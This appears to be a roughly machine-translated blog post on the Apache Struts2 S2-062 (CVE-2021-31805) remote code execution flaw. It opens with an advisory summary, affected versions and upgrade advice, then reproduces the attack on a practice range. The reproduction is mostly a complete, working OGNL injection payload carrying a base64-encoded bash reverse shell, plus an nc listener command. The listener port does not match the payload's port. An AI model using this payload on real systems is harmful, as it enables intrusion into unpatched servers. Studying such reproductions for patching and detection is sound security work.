Preface

Cough , This loophole has been out for a few days , I haven't had time lately , Add a class today to write ！

One 、 Vulnerability description

Apache Struts2 It's based on MVC The popularity of design patterns Web Application framework .

Apache Struts2 Issue safety bulletins （S2-062）, Repair the Apache Struts2 A Remote Code Execution Vulnerability in （CVE-2021-31805）.

Due to CVE-2020-17530 The repair of is incomplete , stay Apache Struts 2.0.0-2.5.29 in , If developers use %{...} Syntax application force OGNL analysis , Some attributes of the tag can still be parsed twice . Parsing raw user input in tag properties that is not validated may result in remote code execution .

Two 、 scope

Apache Struts 2.0.0-2.5.29

3、 ... and 、 Repair suggestions

At present, this vulnerability has been fixed , It is recommended that the affected users upgrade to Apache Struts 2.5.30 Or later .

Download link ：https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.30

Mitigation measures ： Avoid using force on untrusted or unauthenticated user input OGNL analysis .

Four 、 Loophole recurrence

Recurrence environment ：Vulfocus Vulnerability threat analysis platform Online range , This shooting range is still good

1. Visit the home page according to the vulnerability prompt

2. Packet capture home page

3. structure payload, The change request method is post,

name=(%23request.map%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map.setBean(%23request.get('struts.valueStack'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.map2%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map2.setBean(%23request.get('map').get('context'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.map3%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map3.setBean(%23request.get('map2').get('memberAccess'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.get('map3').put('excludedPackageNames',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.get('map3').put('excludedClasses',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b
(%23application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNTQ1NCAwPiYx}|{base64,-d}|{bash,-i}'}))

4. Rebound shell The order of base64 Encoding and processing url code

5. base64  encryption

 

 6.URL encryption

7. Replace the bp Inside

 

 8. Prepare a server to listen

nc -vvlp 7777

9.bp Click send bounce shell

At this point, the whole loophole will reappear

Don't spray today ！！

My idea ： The food should also be reasonable ！！

MHcloud A small dish chicken full of longing for network security